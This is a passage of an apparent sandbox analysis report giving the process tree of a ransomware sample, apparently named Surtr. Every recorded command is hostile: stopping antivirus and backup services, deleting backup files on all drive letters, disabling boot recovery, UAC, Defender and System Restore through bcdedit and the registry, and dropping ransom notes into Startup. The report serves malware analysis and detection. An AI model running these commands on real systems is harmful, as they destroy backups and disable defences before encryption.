  C:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"
  2⤵
  PID:3060
- - C:\Windows\system32\net.exe
    net stop "Sophos Safestore Service"
    3⤵
    PID:2184
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Safestore Service"
      4⤵
      PID:2772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"
  2⤵
  PID:3108
- - C:\Windows\system32\net.exe
    net stop "Sophos System Protection Service"
    3⤵
    PID:3164
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos System Protection Service"
      4⤵
      PID:3176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q Z:\*.bac Z:\*.bak Z:\Backup*.* Z:\backup*.*
  2⤵
  PID:3132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q R:\*.bac R:\*.bak R:\Backup*.* R:\backup*.*
  2⤵
  PID:3140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q G:\*.bac G:\*.bak G:\Backup*.* G:\backup*.*
  2⤵
  PID:3124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q S:\*.bac S:\*.bak S:\Backup*.* S:\backup*.*
  2⤵
  PID:3156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q O:\*.bac O:\*.bak O:\Backup*.* O:\backup*.*
  2⤵
  PID:3148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q U:\*.bac U:\*.bak U:\Backup*.* U:\backup*.*
  2⤵
  PID:3116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q A:\*.bac A:\*.bak A:\Backup*.* A:\backup*.*
  2⤵
  PID:3252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q B:\*.bac B:\*.bak B:\Backup*.* B:\backup*.*
  2⤵
  PID:3240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q H:\*.bac H:\*.bak H:\Backup*.* H:\backup*.*
  2⤵
  PID:3284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\Backup*.* C:\backup*.*
  2⤵
  PID:3304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q W:\*.bac W:\*.bak W:\Backup*.* W:\backup*.*
  2⤵
  PID:3296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q N:\*.bac N:\*.bak N:\Backup*.* N:\backup*.*
  2⤵
  PID:3316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q P:\*.bac P:\*.bak P:\Backup*.* P:\backup*.*
  2⤵
  PID:3392
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"
    3⤵
    PID:2064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q L:\*.bac L:\*.bak L:\Backup*.* L:\backup*.*
  2⤵
  PID:3432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q I:\*.bac I:\*.bak I:\Backup*.* I:\backup*.*
  2⤵
  PID:3424
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$SQL_2008"
    3⤵
    PID:3364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q D:\*.bac D:\*.bak D:\Backup*.* D:\backup*.*
  2⤵
  PID:3404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
  2⤵
  PID:3448
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
    3⤵
    PID:3456
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:3472
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"
      4⤵
      PID:3448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q J:\*.bac J:\*.bak J:\Backup*.* J:\backup*.*
  2⤵
  PID:3384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"
  2⤵
  PID:3376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q M:\*.bac M:\*.bak M:\Backup*.* M:\backup*.*
  2⤵
  PID:3368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q E:\*.bac E:\*.bak E:\Backup*.* E:\backup*.*
  2⤵
  PID:3360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q Y:\*.bac Y:\*.bak Y:\Backup*.* Y:\backup*.*
  2⤵
  PID:3352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q Q:\*.bac Q:\*.bak Q:\Backup*.* Q:\backup*.*
  2⤵
  PID:3344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"
  2⤵
  PID:3464
- - C:\Windows\system32\net.exe
    net stop "SQLsafe Backup Service"
    3⤵
    PID:3480
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLsafe Backup Service"
      4⤵
      PID:3488
    - - C:\Windows\system32\net.exe
        
        net stop "MSSQLSERVER"
        5⤵
        
        PID:3480
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLSERVER"
      4⤵
      PID:3464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q V:\*.bac V:\*.bak V:\Backup*.* V:\backup*.*
  2⤵
  PID:3336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q K:\*.bac K:\*.bak K:\Backup*.* K:\backup*.*
  2⤵
  PID:3324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q X:\*.bac X:\*.bak X:\Backup*.* X:\backup*.*
  2⤵
  PID:3276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q T:\*.bac T:\*.bak T:\Backup*.* T:\backup*.*
  2⤵
  PID:3268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q F:\*.bac F:\*.bak F:\Backup*.* F:\backup*.*
  2⤵
  PID:3260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  2⤵
  PID:3496
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    3⤵
    PID:3512
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:3528
    - - C:\Windows\system32\net.exe
        
        net stop "MSSQLServerADHelper100"
        5⤵
        
        PID:3536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"
  2⤵
  PID:3504
- - C:\Windows\system32\net.exe
    net stop "SQLsafe Filter Service"
    3⤵
    PID:3520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLsafe Filter Service"
      4⤵
      PID:3536
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerADHelper100"
        5⤵
        
        PID:3512
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLServerOLAPService"
      4⤵
      PID:3508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  PID:3548
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:3572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"
  2⤵
  PID:3556
- - C:\Windows\system32\net.exe
    net stop "Symantec System Recovery"
    3⤵
    PID:3564
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Symantec System Recovery"
      4⤵
      PID:3580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"
  2⤵
  PID:3596
- - C:\Windows\system32\net.exe
    net stop "Veeam Backup Catalog Data Service"
    3⤵
    PID:3612
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"
      4⤵
      PID:3632
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMwareHostd"
      4⤵
      PID:3632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:3588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:3624
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:3640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:3648
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "AcronisAgent"
  2⤵
  PID:3656
- - C:\Windows\system32\net.exe
    net stop "AcronisAgent"
    3⤵
    PID:3672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "AcronisAgent"
      4⤵
      PID:3680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
  2⤵
  PID:3688
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
    3⤵
    PID:3696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"
  2⤵
  PID:3704
- - C:\Windows\system32\net.exe
    net stop "AcrSch2Svc"
    3⤵
    PID:3720
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "AcrSch2Svc"
      4⤵
      PID:3728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  2⤵
  PID:3712
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:3736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:3752
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:3760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Antivirus"
  2⤵
  PID:3744
- - C:\Windows\system32\net.exe
    net stop "Antivirus"
    3⤵
    PID:3768
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Antivirus"
      4⤵
      PID:3784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
  2⤵
  PID:3776
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:3792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"
  2⤵
  PID:3800
- - C:\Windows\system32\net.exe
    net stop "BackupExecAgentAccelerator"
    3⤵
    PID:3816
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecAgentAccelerator"
      4⤵
      PID:3824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  2⤵
  PID:3808
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:3832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"
  2⤵
  PID:3840
- - C:\Windows\system32\net.exe
    net stop "BackupExecAgentBrowser"
    3⤵
    PID:3864
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecAgentBrowser"
      4⤵
      PID:3872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:3848
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:3856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
  2⤵
  PID:3880
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:3888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
  2⤵
  PID:3896
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:3904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"
  2⤵
  PID:3912
- - C:\Windows\system32\net.exe
    net stop "BackupExecDeviceMediaService"
    3⤵
    PID:3920
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecDeviceMediaService"
      4⤵
      PID:3936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
  2⤵
  PID:3928
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:3944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:3952
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:3968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"
  2⤵
  PID:3960
- - C:\Windows\system32\net.exe
    net stop "BackupExecJobEngine"
    3⤵
    PID:3976
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecJobEngine"
      4⤵
      PID:3984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:3992
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:4008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"
  2⤵
  PID:4000
- - C:\Windows\system32\net.exe
    net stop "BackupExecManagementService"
    3⤵
    PID:4024
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecManagementService"
      4⤵
      PID:4040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:4016
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:4032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:4048
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:4080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"
  2⤵
  PID:4056
- - C:\Windows\system32\net.exe
    net stop "BackupExecRPCService"
    3⤵
    PID:4064
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecRPCService"
      4⤵
      PID:4072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"
  2⤵
  PID:4088
- - C:\Windows\system32\net.exe
    net stop "BackupExecVSSProvider"
    3⤵
    PID:1964
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecVSSProvider"
      4⤵
      PID:2960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
  2⤵
  PID:2776
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:3088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "EPSecurityService"
  2⤵
  PID:2364
- - C:\Windows\system32\net.exe
    net stop "EPSecurityService"
    3⤵
    PID:3096
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "EPSecurityService"
      4⤵
      PID:3100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
  2⤵
  PID:2468
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:2440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:2416
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:2860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "IISAdmin"
  2⤵
  PID:2184
- - C:\Windows\system32\net.exe
    net stop "IISAdmin"
    3⤵
    PID:2344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:2716
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:2392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"
  2⤵
  PID:2340
- - C:\Windows\system32\net.exe
    net stop "IMAP4Svc"
    3⤵
    PID:2420
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "IMAP4Svc"
      4⤵
      PID:2352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:2368
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:2328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "macmnsvc"
  2⤵
  - Enumerates connected drives
  PID:2244
- - C:\Windows\system32\net.exe
    net stop "macmnsvc"
    3⤵
    PID:964
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "macmnsvc"
      4⤵
      PID:1616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:2148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  - Enumerates connected drives
  PID:2228
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:756
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:1600
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
      4⤵
      PID:756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "masvc"
  2⤵
  PID:1272
- - C:\Windows\system32\net.exe
    net stop "masvc"
    3⤵
    PID:1144
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "masvc"
      4⤵
      PID:2008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MBAMService"
  2⤵
  PID:2160
- - C:\Windows\system32\net.exe
    net stop "MBAMService"
    3⤵
    PID:1020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MBAMService"
      4⤵
      PID:1500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:1100
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
  2⤵
  PID:3116
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:3132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"
  2⤵
  PID:2528
- - C:\Windows\system32\net.exe
    net stop "MBEndpointAgent"
    3⤵
    PID:3152
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MBEndpointAgent"
      4⤵
      PID:828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"
  2⤵
  PID:2888
- - C:\Windows\system32\net.exe
    net stop "McAfeeEngineService"
    3⤵
    PID:2816
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "McAfeeEngineService"
      4⤵
      PID:2856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"
  2⤵
  PID:2516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
  2⤵
  PID:2540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"
  2⤵
  PID:2808
- - C:\Windows\system32\net.exe
    net stop "McAfeeFramework"
    3⤵
    PID:3036
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "McAfeeFramework"
      4⤵
      PID:3204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
  2⤵
  - Drops startup file
  PID:2612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
  2⤵
  - Drops startup file
  PID:3196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
  2⤵
  PID:2988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"
  2⤵
  PID:204
- - C:\Windows\system32\net.exe
    net stop "McAfeeFrameworkMcAfeeFramework"
    3⤵
    PID:2752
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"
      4⤵
      PID:2880
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "tmlisten"
        5⤵
        
        PID:2752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"
  2⤵
  PID:212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"
  2⤵
  PID:3216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
  2⤵
  PID:3220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
  2⤵
  PID:3224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "McShield"
  2⤵
  PID:2604
- - C:\Windows\system32\net.exe
    net stop "McShield"
    3⤵
    PID:1816
  - - C:\Windows\system32\net1.exe
